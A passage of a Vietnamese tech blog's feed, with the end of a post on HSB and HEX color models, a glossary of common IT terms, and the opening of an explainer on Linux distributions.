&lt;center&gt;&lt;img width=&quot;450&quot; height=&quot;450&quot; class=&quot;img-thumbnail&quot; src=&quot;/image/LAB.png&quot; /&gt;&lt;/center&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;hr /&gt;

&lt;h1 style=&quot;text-align: center;&quot;&gt;HSB&lt;/h1&gt;

&lt;p&gt;HSB hoặc V - viết tắt &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Hue - Saturation - Bright/Value&lt;/code&gt;&lt;/strong&gt; trong đó:&lt;/p&gt;

&lt;p&gt;(Hue): Liên quan đến dải màu đỏ - cam - vàng - lục - lam - chàm - tím. Được biểu diễn có giá trị từ 0° đến 360°.&lt;br /&gt;
(Saturation): Liên quan đến sắc độ, có giá trị từ 0% đến 100%.&lt;br /&gt;
(Bright/Value): Độ sáng - tối, có giá trị từ 0% đến 100%&lt;br /&gt;&lt;/p&gt;

&lt;center&gt;&lt;img width=&quot;450&quot; height=&quot;450&quot; class=&quot;img-thumbnail&quot; src=&quot;/image/HSB.png&quot; /&gt;&lt;/center&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;hr /&gt;

&lt;h1 style=&quot;text-align: center;&quot;&gt;HEX&lt;/h1&gt;

&lt;p&gt;HEX - viết tắt &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;Hexadecimal&lt;/code&gt;&lt;/strong&gt;, hệ thống màu biểu diễn giá trị màu sắc RGB dưới dạng thập lục phân, một chuỗi bao gồm 6 chữ hoặc số dạng ghép của 3 số dạng một byte. Mỗi byte đại diện cho một số trong khoảng 00 - FF tức 0 - 255 trong hệ thập phân.&lt;/p&gt;

&lt;center&gt;&lt;img width=&quot;350&quot; height=&quot;350&quot; class=&quot;img-thumbnail&quot; src=&quot;/image/HEX.jpg&quot; /&gt;&lt;/center&gt;

&lt;hr /&gt;
&lt;hr /&gt;

&lt;p&gt;Cảm ơn các bạn đã ghé qua blog của mình, đừng quên ấn nút share để bạn bè cùng biết đến nhé !&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://congnghevacuocsong.tk/khai-niem-mau-sac-trong-thiet-ke-p1&quot;&gt;khái niệm màu sắc trong thiết kế Phần 1&lt;/a&gt; &lt;br /&gt;
&lt;a href=&quot;https://congnghevacuocsong.tk/khai-niem-mau-sac-trong-thiet-ke-p2&quot;&gt;khái niệm màu sắc trong thiết kế Phần 2&lt;/a&gt; &lt;br /&gt;&lt;/p&gt;</content><author><name>Panadora</name></author><category term="[&quot;graphics&quot;, &quot;news&quot;, &quot;css&quot;]" /><category term="color" /><category term="graphics" /><category term="màu sắc" /><category term="khái niệm màu sắc" /><summary type="html">Chào các bạn, mình sẽ tiếp tục với series của khái niệm màu sắc trong thiết kế phần 3.</summary></entry><entry><title type="html">Một số thuật ngữ chuyên ngành CNTT</title><link href="http://localhost:4000/mot-so-thuat-ngu-chuyen-nganh-cntt.html" rel="alternate" type="text/html" title="Một số thuật ngữ chuyên ngành CNTT" /><published>2020-05-03T00:00:00+07:00</published><updated>2020-05-03T00:00:00+07:00</updated><id>http://localhost:4000/mot-so-thuat-ngu-chuyen-nganh-cntt</id><content type="html" xml:base="http://localhost:4000/mot-so-thuat-ngu-chuyen-nganh-cntt.html">&lt;p&gt;&lt;img src=&quot;/image/202053-title-image-tn.jpg&quot; alt=&quot;image-title-here&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Từ chuyên ngành luôn là hành trang cần thiết đối với một comtor, nhất là đối với một comtor chưa có kinh nghiệm trong lĩnh vực CNTT thì việc hiểu ý nghĩa của từ chuyên ngành cũng là một điều không thể thiếu. Chính vì vậy, trong bài viết này mình xin giới thiệu về khái niệm của một số từ chuyên ngành trong lĩnh vực CNTT này.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Archive ( Lưu trữ )&lt;/strong&gt; : Là phần mềm dùng để tổng hợp nhiều file vào chung 1 file. Nhờ việc tổng hợp này mà giảm được thời gian gửi nhận file qua network, bên cạnh đó việc quản lí ổ cứng cũng sẽ trở nên đơn giản hơn.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Account ( Tài khoản )&lt;/strong&gt; : Là tài khoản cần thiết khi sử dụng, hay còn gọi là quyền sử dụng resource trên máy tính hoặc trên network.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;data compression ( Nén dự liệu )&lt;/strong&gt; : Khôi phục lại trạng thái ban đầu của dữ liệu đã bị nén dung lượng.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Add in ( Add on / Thêm vào )&lt;/strong&gt; : Là chức năng mở rộng được bổ sung cho application. Để bổ sung thêm chức năng mở rộng, các application cần phải được thiết kế sao cho có thể ứng dụng được các chức năng này.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Application service provider ( Nhà cung cấp dịch vụ ứng dụng )&lt;/strong&gt; : Dùng để chỉ các nhà cung cấp thông qua internet thuê các phần mềm ứng dụng (application soft) phục vụ cho business để đáp ứng cho khách hàng. User sẽ thông qua trình duyệt Web để sử dụng application soft đã được cài đặt ở server lưu ASP.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Algorithm ( Thuật toán )&lt;/strong&gt; : Là trình tự xử lí để có thể thực hiện 1 hoặc nhiều thao tác trên máy tính, ngoài ra nó được ứng dụng để phát triển &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;trí tuệ nhân tạo (AI)&lt;/code&gt;&lt;/strong&gt; để xứ lý những công việc khó khăn hiện tại đến sau này.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Web Invisible Web ( web ẩn danh )&lt;/strong&gt; : Là nhóm các thông tin mà search engine không thể tìm ra được trong các thông tin được công khai ở &lt;strong&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;www.&lt;/code&gt;&lt;/strong&gt;, và nhóm thông tin này sẽ không được kiểm duyệt và bị loại bỏ hiện thị trên các trình duyệt có &lt;code class=&quot;highlighter-rouge&quot;&gt;Proxy&lt;/code&gt; máy chủ để bảo mật an toàn.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Infra (infrastructure / Cơ sở hạ tầng)&lt;/strong&gt; : Là từ tiếng Anh được dùng với ý nghĩa chỉ cấu tạo nền móng, cơ sở, có thể gọi tắt là infra. Trong lĩnh vực IT, từ này được dùng để nói đến các chế độ, thiết bị cơ sở cần thiết để cho các hệ thống được hoạt động có hiệu quả.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HTML ( Hyper Text Markup Language )&lt;/strong&gt; : Là ngôn ngữ mark-up để tạo nên các Web page. HTML được sử dụng để tạo nên cấu trúc logic của văn bản hay diện mạo của trang web. Ngoài ra, cũng có thể chèn hình ảnh, âm thanh, video vào trong văn bản, hay cũng có thể chèn các hyper link đến các văn bản khác. Chúng ta sẽ sử dụng trình duyệt Web để xem các văn bản được tạo bằng HTML. Tuy nhiên, các văn bản HTML là một dạng của text nên khi mở HTML bằng text editor thì ở mỗi thẻ tag đều có thể đọc và viết giống như văn bản text.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SSL ( chứng chỉ SSL )&lt;/strong&gt; : Là protocol được nhận và gửi sau khi thông tin được mã hóa trên internet như các bạn đã thấy các trang web có SSL sẽ hiển thị &lt;label style=&quot;color: green;&quot;&gt;https://&lt;/label&gt;, do công ty Netscape Communications phát triển. Sau khi mã hóa dữ liệu (data) như FTP, www được sử dụng rộng rãi trên mạng internet thì việc truyền gửi các thông tin liên quan đến privacy, sredit card number, bí mật doanh nghiệp,…trở nên dễ dàng hơn.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SGML (Standard Generalized Mark-up Language)&lt;/strong&gt; : Là ngôn ngữ xây dựng cấu trúc logic, ý nghĩa cho văn bản. Có thể đánh dấu những phần có ý nghĩa đặc biệt ở trong văn bản như tiêu đề (title), trích dẫn,…&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;XHTML(Extensible Hyper Text Markup Language)&lt;/strong&gt; : Là ngôn ngữ markup để xác định lại HTML được dùng để tạo nên Web page, sao cho phù hợp với XML. Bên cạnh đó ngôn ngữ markup này được dùng để tạo nên cấu trúc, ý nghĩa của dữ liệu hay đoạn văn XML(Extensible Markup Language). Ngôn ngữ markup chính là ngôn ngữ chèn cấu tạo vào đoạn văn bằng các chuỗi kí tự đã được chỉ định trước được gọi là các thẻ tag. Vì user có thể chỉ định các thẻ tag cá nhân nên XML cũng được gọi là ngôn ngữ meta – ngôn ngữ dùng để tạo ngôn ngữ markup. Vốn dĩ XML được tạo ra như là một tập con (sub-set) của “SGML” có khả năng chỉ định các thẻ tag cá nhân giống nhau, và nó được tạo ra với mục tiêu là truyền gửi dữ liệu tùy ý giống như HTML. Xét về các tính chất khác thì XML phần lớn được sử dụng như là framework của các ngôn ngữ markup khác.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OS (operating system)&lt;/strong&gt; : Là phần mềm quản lí toàn bộ hệ thống máy tính, cung cấp các chức năng cơ bản được sử dụng như các chức năng in/out: keyboard input, screen output, disk, quản lí memory,… Có thể gọi là “phần mềm cơ bản” hay được gọi với tên quen thuộc &lt;code class=&quot;highlighter-rouge&quot;&gt;Hệ Điều Hành&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Online storage&lt;/strong&gt; : Là dịch vụ cho mượn disk space dùng để lưu trữ file trên internet và được phân thành 2 loại: miễn phí và trả phí. Trường hợp dùng bản miễn phí, khi sử dụng sẽ hiển thị các mục quảng cáo.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Online translation service ( dịch vụ dịch thuật trực tuyến)&lt;/strong&gt; : Là dịch vụ sử dụng các application để dịch các web page, text được viết bằng ngôn ngữ mà user không đọc được và cung cấp bản dịch cho user.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Extension ( tiện ích mở rộng )&lt;/strong&gt; : cũng như (add-on) là tệp tin tiện ích bổ sung cho 1 ứng dụng nào đó, nếu ứng dụng đó được các nhà phát triển thêm vào thanh công cụ cho người dùng có thể lựa chọn phù hợp.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Customize&lt;/strong&gt; : Điều chỉnh lại thiết kế, setting của phần mềm và chỉnh sửa lại cho phù hợp với yêu cầu cá nhân của user.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cookie&lt;/strong&gt; : Là một dạng bản ghi được tạo ra và lưu trữ tạm thời trên máy tính thông qua trình duyệt Web.&lt;/p&gt;

&lt;p&gt;Search engine optimization (SEO) : Là tập hợp các phương pháp nhằm đưa website lên vị trí TOP trong các trang kết quả của các công cụ tìm kiếm.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Control panel&lt;/strong&gt; : Là menu tập chung các phần mềm software để setting máy tính, OS. Thường được sử dụng cho các màn hình thao tác như Windows, Mac OS.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Server&lt;/strong&gt; : Trong mạng máy tính, server là máy tính cung cấp các dữ liệu, chức năng nó đang có cho các máy tính client. Nó tương ứng với www server trên mạng internet.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thumbnail&lt;/strong&gt; : Là ảnh đã được thu nhỏ để hiển thị nhiều ảnh trong 1 list.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;JAVA&lt;/strong&gt; : Là ngôn ngữ lập trình do công ty Sun Microsystems phát triển. Java sử dụng hệ thống kí hiệu giống với ngôn ngữ C tuy nhiên ngôn ngữ Java được xây dựng trên những điểm yếu của các ngôn ngữ hiên tại, nó được trang bị định hướng đối tượng hoàn chỉnh cái mà ngôn ngữ hiện tại không có. Ngoài ra, ngôn ngữ này cũng được trang bị cơ chế bảo mật mạnh mẽ cũng như các chức năng liên quan đến network phong phú, chính vì vậy nó cũng đã trở thành một kĩ thuật được sử dụng nhiều trong môi trường network.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Integrated circuit (IC)&lt;/strong&gt; : Là bảng mạch điện tử có nhiều loại chức năng và được lắp đặt các chi tiết như là: transistor, điện trở, tụ điện, diode,…&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Spell checker&lt;/strong&gt; : Là chức năng kiểm tra chính tả do user input vào, word-processing software đều được trang bị chức năng này. Hiện tại chức năng này cũng được sử dụng nhiều cho phần mềm thư điện tử. Spell checker sẽ đưa ra cảnh báo khi phát hiện thấy lỗi chính tả (spell miss), user có thể chỉnh sửa lại cho đúng chính tả hoặc bổ sung từ đó thêm vào từ điển để sử dụng.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thread&lt;/strong&gt; :Là tập hợp nhiều bài viết thuộc cùng một chủ đề như bảng thông tin điện tử, news group, mailing list,… Do tập hợp nhiều bài viết trong cùng một thread nên user có thể dễ dàng lựa chọn chủ đề mà mình quan tâm.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt; : Là hệ thống thông tin dùng để thực hiện các yêu cầu, giải quyết các vấn đề nghiệp vụ. Các nhà cung cấp sẽ thiết kế hệ thống theo yêu cầu của khách hàng, tổng hợp các yếu tố cần thiết (hardware, software, đường truyền thông, nhân viên hỗ trợ,…) và cung cấp cho họ. Đây là từ mang nhiều ý nghĩa và thường được sử dụng với ý nghĩa về “sản phẩm được customize” hay “sản phẩm trọn gói bao gồm nhiều sản phẩm”&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Multiple language&lt;/strong&gt; : Là một bước trong việc đáp ứng đa ngôn ngữ của software, được xây dựng để đáp ứng cho nhiều loại ngôn ngữ khác nhau. User có thể thay đổi và cài đặt lại ngôn ngữ cho phù hợp với ngôn ngữ của mình sử dụng.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Decode&lt;/strong&gt; : Phục hồi lại dữ liệu bị mã hóa, hiểu nôm na dịch ngược ngôn ngữ máy thành ngôn ngữ bật cao, dựa trên các quy tắc nhất định để đưa ra dữ liệu gốc. Phần mềm giải mã được gọi là decode. Decode cũng được dùng cho các trường hợp như là phục hồi lại dữ liệu đã bị nén, giải mã hóa. Việc thực hiện mã hóa dữ liệu dựa trên các quy định bắt buộc được gọi là encode.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Database&lt;/strong&gt; : Là tập hợp các dữ liệu được chia sẻ bởi các user hay bởi các application. Ngoài ra, cũng có trường hợp data base bao gồm cả hệ thống quản lí.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Domain&lt;/strong&gt; : Là phần mở rộng hay còn biết đến với cách gọi là &lt;code class=&quot;highlighter-rouge&quot;&gt;tên miền&lt;/code&gt; nhằm thay thế cho Internet Protocol (IP) là những con số dấu chấm vô nghĩa với người dùng, nhầm để người dụng dễ nhớ dễ thao tác truy cập. Ví dụ như: &lt;code class=&quot;highlighter-rouge&quot;&gt;https://congnghevacuocsong.tk&lt;/code&gt; tên miền sẽ là ( congnghevacuocsong.tk ).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Normalize&lt;/strong&gt; : Thay đổi dữ liệu theo quy định nhất định để làm cho nó sử dụng dễ dàng hơn. Đây là từ được sử dụng ở nhiều lĩnh vực, tùy từng lĩnh vực mà ý nghĩa của từ này lại khác đi.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Script&lt;/strong&gt; : Là chương trình đơn giản dùng để thu gọn các thao tác chuyển đổi sang ngôn máy tính sao cho dễ dàng thực hiện. Thông thường, dựa trên source code do các lập trình viên viết các chương trình sẽ được chuyển đổi sang ngôn ngữ máy tính sao cho máy tính có thể hiểu và thực hiện được. Người ta gọi chương trình làm cho quá trình trên được tự động hóa và thực hiện một cách dễ dàng là Script. Trong ngôn ngữ dùng để mô tả scrip (ngôn ngữ scrip) có Perl, VBScript, JavaScript,…&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bytes&lt;/strong&gt; : Là đơn vị đo lượng thông tin. 1 bytes = 8 bit. Việc lưu trữ, xử lí thông tin, truyền tải của máy tính thường được tính bằng bytes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hypertext&lt;/strong&gt; : Là một hệ thống văn bản sử dụng máy tính. Là cơ cấu có thể liên kết nhiều văn bản với nhau, chèn thông tin vị trí (hyperlink) của một văn bản vào một văn bản tùy chọn.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bug&lt;/strong&gt; : Là lỗi ở trong chương trình máy tính. Các chương trình trong máy tính là do con người tạo nên nên việc tạo ra một chương trình hoàn toàn không có lỗi là điều không thể. Do vậy, thao tác loại bỏ bug là một thao tác quan trong không thể thiếu trong quá trình phát triển phần mềm (thao tác này được gọi là “debug”). Thông thường người ta sử dụng phần mềm Debugger để hỗ trợ phát hiện ra và xử lí bug. Các nhân viên phát triển phần mềm khi phát hiện ra bug sẽ xử lí bug.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Optical disk&lt;/strong&gt; : Là phương tiện lưu trữ sử dụng chùm laser để đọc và ghi dữ liệu. Các ví dụ tiêu biểu cho Optical disk là CD, DVD, PD,…&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Firewall ( Tường lửa )&lt;/strong&gt; : Là hệ thống phòng tránh sự xâm nhập từ bên ngoài vào bên trong mạng lưới computer network của tổ chức. Ngoài ra, nó cũng được hiểu là máy tính có chứa các hệ thống như này.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flash&lt;/strong&gt; : Là phần mềm do công ty Macromedia (nay là công ty Adobe) phát triển. Đây là phần mềm kết hợp âm thanh, animation của đồ họa vector để tạo nên Web content. Ngoài ra cũng có nhiều content được tạo ra bởi flash.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Proxy&lt;/strong&gt; : Là máy tính có thể kết nối trực tiếp với mạng internet, giúp cho các máy tính trong mạng nội bộ có thể kết nối với internet, máy này được gọi là Proxy.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory&lt;/strong&gt; : Là thiết bị lưu trữ dữ liệu gọi ngắn gọn là bộ nhớ, chương trình ở trong máy tính.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Usability&lt;/strong&gt; : Là tính năng “dễ sử dụng” của phần mềm hay của website. Có thể dễ dàng truy cập vào nhiều chức năng, không cảm thấy phiền toái hay khó chịu khi sử dụng chính là mục tiêu tối ưu của usability.&lt;/p&gt;

&lt;hr /&gt;</content><author><name>Panadora</name></author><category term="[&quot;other&quot;, &quot;news&quot;]" /><summary type="html">Từ chuyên ngành luôn là hành trang cần thiết đối với một comtor</summary></entry><entry><title type="html">Tìm hiểu về distro linux</title><link href="http://localhost:4000/tim-hieu-ve-distro-linux.html" rel="alternate" type="text/html" title="Tìm hiểu về distro linux" /><published>2020-04-25T00:00:00+07:00</published><updated>2020-04-25T00:00:00+07:00</updated><id>http://localhost:4000/tim-hieu-ve-distro-linux</id><content type="html" xml:base="http://localhost:4000/tim-hieu-ve-distro-linux.html">&lt;p&gt;&lt;strong&gt;Distro Linux là gì?. Nên dùng Distro Linux nào, chúng có gì khác nhau ?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Bạn mới tìm hiểu về Linux và chưa biết Distro Linux là gì, các bản distro linux có gì giống và khác nhau. Hãy xem bài viết dưới đây của HostingViet.&lt;/p&gt;

&lt;p&gt;Có lẽ “linux” không còn xa lạ với nhiều người. Vì chúng xuất hiện rất nhiều lần trong tin tức hay những bài viết liên quan đến phần mềm mã nguồn mở. Thế nhưng, không phải ai cũng hiểu rõ về “linux”. Chính vì thế, chia sẻ sau sẽ giúp các bạn hiểu về distro linux là gì và lý do chúng ta nên quan tâm.&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/2020425distrolagi.png&quot; width=&quot;1000&quot; height=&quot;auto&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h3 style=&quot;font-weight: bold;&quot;&gt;Distro linux là gì ?&lt;/h3&gt;

&lt;p&gt;Ban đầu, Linux chính là một hệ điều hành được tạo bởi Linus Torwalds và sau đó phát triển thành giải pháp hệ điều hành mã nguồn mở, nhằm giảm sự lệ thuộc vào những hệ điều hành đóng, ví dụ như Microsoft Windows.&lt;/p&gt;

&lt;p&gt;Hệ điều hành mở cho phép người dùng sử dụng miễn phí, tự do phát triển và định hướng hay tùy chỉnh theo nhu cầu thực tế của mình (được gọi là distro Linux hay distribution Linux). Đây chính là điều hạn chế của các hệ điều hành đóng. Bên cạnh đó, mã nguồn mở còn giúp cho các hacker ít có cơ hội thực hiện âm mưu không tốt đối với người dùng.&lt;/p&gt;

&lt;p&gt;Vì thế, do sự thuận tiện trong việc dựa vào nền tảng hệ điều hành Linux để tùy chỉnh theo mục đích sử dụng, nên nhiều người nghĩ Linux chính là phần cốt lõi giúp hệ điều hành dễ dàng điều khiển các phần cứng. Hay nói cách khác, dựa vào Linux, nhiều người đã phát triển thêm các hệ điều hành.&lt;/p&gt;

&lt;p&gt;Hiện nay, hệ điều hành Linux được ứng dụng rộng rãi, nhất là trong mảng server và các thiết bị internet of things. Ngay cả các biển báo sân bay, máy đổi tiền và server các website này cũng sử dụng mã nguồn mở. Hay thiết bị di động sử dụng hệ điều hành Android mà bạn đang sử dụng cũng được xây dựng trên nền tảng Linux.&lt;/p&gt;

&lt;h3 style=&quot;font-weight: bold;&quot;&gt;Các bản distrolinux&lt;/h3&gt;

&lt;p&gt;Mỗi distro Linux sẽ hướng đến một nhóm đối tượng và phục vụ nhu cầu sử dụng khác nhau. Vì mã nguồn mở nên người dùng dễ dàng tùy ý điều chỉnh và đặt tên theo sở thích, miễn là tuân thủ theo quy định. Vậy giữa các distro giống và khác nhau thế nào?&lt;/p&gt;

&lt;h3 style=&quot;font-weight: bold;&quot;&gt;Giữa các distro giống và khác nhau thế nào ?&lt;/h3&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/2020425distroquestion.png&quot; width=&quot;1000&quot; height=&quot;auto&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Điểm giống nhau là về cơ bản, chúng đều dựa trên 3 nhánh chính, đó là Debian, Red Hat, Slackware. Đồng thời, tất cả các bản distrolinux đều có Kernel và Linux.&lt;/p&gt;

&lt;p&gt;Còn khác nhau thì chủ yếu dựa vào 2 yếu tố chính: thị trường distro Linux là gì và triết lý phần mềm của chúng.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Xét về thị trường:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Các distro Linux phổ biến và phát triển hiện nay được chia thành 4 nhóm:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Nhóm 1: Arch, Gentoo và Slackware&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Các các bản distrolinux này nhắm vào người dùng am hiểu Linux. Do đó, phần lớn các phương thức xây dựng, cũng như cấu hình của hệ thống được thực hiện qua dòng lệnh.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Nhóm 2: Debian, Fedora&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Đối tượng người dùng của nhóm 2 là người am hiểu về hệ thống nhưng chưa thực sự hiểu về Linux. Vì vậy, distro sẽ cung cấp cho họ nhiều công cụ hơn. Nhóm này phù hợp với người dùng mới bắt đầu sử dụng Linux.&lt;/p&gt;

&lt;p&gt;Tuy nhiên, các distro của nhóm 2 lại có quy trình phát triển và kiểm tra chất lượng phần mềm khắt khe hơn các nhóm còn lại. Do đó, để trở thành lập trình viên chính thức của nhóm này, bạn buộc phải có thời gian đóng góp dài. Đồng thời, được chứng nhận chất lượng bởi những lập trình viên khác. Vì thế, giới công nghệ luôn đánh giá cao môi trường của nhóm Debian, Fedora.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Nhóm 3: Centos, RHEL, SUSE EL&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Các bản distrolinux nhắm vào thị trường máy chủ, doanh nghiệp, cơ quan… Vì chúng có sự ổn định cao, thời gian ra phiên bản mới lâu, khoảng 3 – 5 năm tùy distrolinux. Ngoài ra, còn có dịch vụ hỗ trợ thương mại cho công ty, hướng dẫn sử dụng sản phẩm.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Nhóm 4: Ubuntu, Open SUSE, Linux Mint&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Đối tượng khách hàng của nhóm 4 là người mới bắt đầu dùng Linux và người dùng cuối. Đặc tính của chúng là phát triển trong thời gian ngắn, ứng dụng các công nghệ mới liên tục, nhiều công cụ đồ họa để thiết kế và cấu hình hệ thống theo nhu cầu sử dụng. Nhóm này cũng rất thân thiện với người dùng mới làm quen Linux.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Xét về triết lý phần mềm (Distro Philosophy)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Triết lý phần mềm là những nguyên tắc, hay định hướng, mục tiêu của người phát triển chúng đặt ra. Vì thế, khi xét về yếu tố này thì distro cũng được phân thành 4 nhóm.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Nhóm 1: nhóm này có cấu trúc gọn, linh hoạt để các lập trình viên có thể xây dựng theo nhu cầu của mình.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Nhóm 2: nhóm này nhắm đến sự chuẩn hóa quá trình phát triển phần mềm, nhằm tạo ra hệ thống hoạt động nhịp nhàng và hạn chế tối đa lỗ hỏng bảo mật.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Nhóm 3: phát triển theo hướng bền vững, chuyên nghiệp, phù hợp cho việc cung cấp dịch vụ/sản phẩm dài hạn, có vòng đời lên tới 7 năm.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Nhóm 4: đi theo hướng công nghệ. Nhóm này có nhiều công cụ hiệu ứng đồ họa và không cần cấu hình nhiều.&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Như vậy, dù xét về thị trường hay triết lý phần mềm thì cũng đều có 4 nhóm distro để bạn quyết định nên dùng distro Linux nào phù hợp nhất với nhu cầu của mình.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/2020425treeuser.png&quot; alt=&quot;title-image-here&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;

&lt;h3 style=&quot;font-weight: bold;&quot;&gt;Tại sao người dùng phải quan tâm đến distro Linux là gì ?&lt;/h3&gt;

&lt;p&gt;Phần mềm mã nguồn mở nói chung và các bản phân phối Linux nói riêng được phát triển nhằm cung cấp cho các lập trình viên sự miễn phí. Đồng thời, tùy ý điều chỉnh theo mục đích của mình. Vì thế, bạn cần quan tâm và hiểu rõ chúng để sử dụng phù hợp nhất.&lt;/p&gt;

&lt;p&gt;Tại Việt Nam, khi vấn đề bản quyền vẫn còn chưa được chú trọng thì hầu như giá trị các phần mềm cũng không được đầu tư thỏa đáng. Vì chúng có giá không hề rẻ. Điển hình như bản Windows 10 Home bản quyền giá $119.99. Giá trị này khá lớn với một cá nhân. Còn đối với doanh nghiệp thì khi nhân lên số lượng máy đang sử dụng, chắc chắn sẽ ra một con số ngân sách không hề nhỏ.&lt;/p&gt;

&lt;p&gt;Vì thế, xu hướng tìm các bản phần mềm có key lậu ngày càng nhiều. Điều này dẫn đến rủi ro bị đánh cắp thông tin, cài mã độc, … khi bạn sử dụng chúng.&lt;/p&gt;

&lt;p&gt;Do đó, &lt;strong&gt;các bản distrolinux&lt;/strong&gt; mang đến những ưu điểm nổi bật là tính an toàn cao, hoạt động ổn định, miễn phí và thân thiện với người dùng. Chúng vô cùng thích hợp với người có nhu cầu sử dụng đơn giản cho máy tính.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/image/distro-board.jpg&quot; alt=&quot;title-image-here&quot; width=&quot;100%&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Bên cạnh đó, tùy từng ngành nghề mà bạn có thể lựa chọn nên dùng distro Linux nào giúp làm việc hiệu quả hơn.&lt;/p&gt;

&lt;p&gt;Và trên hết, như đã đề cập ở trên, Linux mang đến cho bạn sự tự do tùy chỉnh. Với cá nhân, đều này rất đơn giản, bạn có thể giải quyết nhanh chóng những vấn đề phát sinh trong quá trình sử dụng. Còn với các doanh nghiệp hay nhà cung cấp dịch vụ, Linux như một kho tàng để rèn dũa thành bất kỳ công cụ nào theo nhu cầu.&lt;/p&gt;

&lt;p&gt;Tuy nhiên, ngoài các ưu điểm nổi trội trên thì Linux cũng có mặt hạn chế. Đó là trên thị trường máy tính cá nhân, Linux vẫn còn yếu so với Windows hay MacOS, Do 2 đơn vị này có sự hậu thuẫn từ 2 ông lớn Microsoft và Apple. Vì vậy, người dùng đôi khi phát sinh một số lỗi nhỏ trên máy tính.&lt;/p&gt;

&lt;center&gt;&lt;img class=&quot;img-thumbnail&quot; src=&quot;/image/hostinglinuxdistro.jpg&quot; width=&quot;1000&quot; height=&quot;auto&quot; /&gt;&lt;/center&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h3 style=&quot;font-weight: bold;&quot;&gt;Tại sao Developer quan tâm distro Linux ?&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Linux là mã nguồn mỡ và hoàn toàn miễn phí, bảo mật tốt, coi như là sự chọn hợp lý cho người dùng phổ thông cho việc tiết kiểm chi tiêu về vấn đề bản quyền, đối với người dùng Việt Nam cũng không ngoại lệ.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
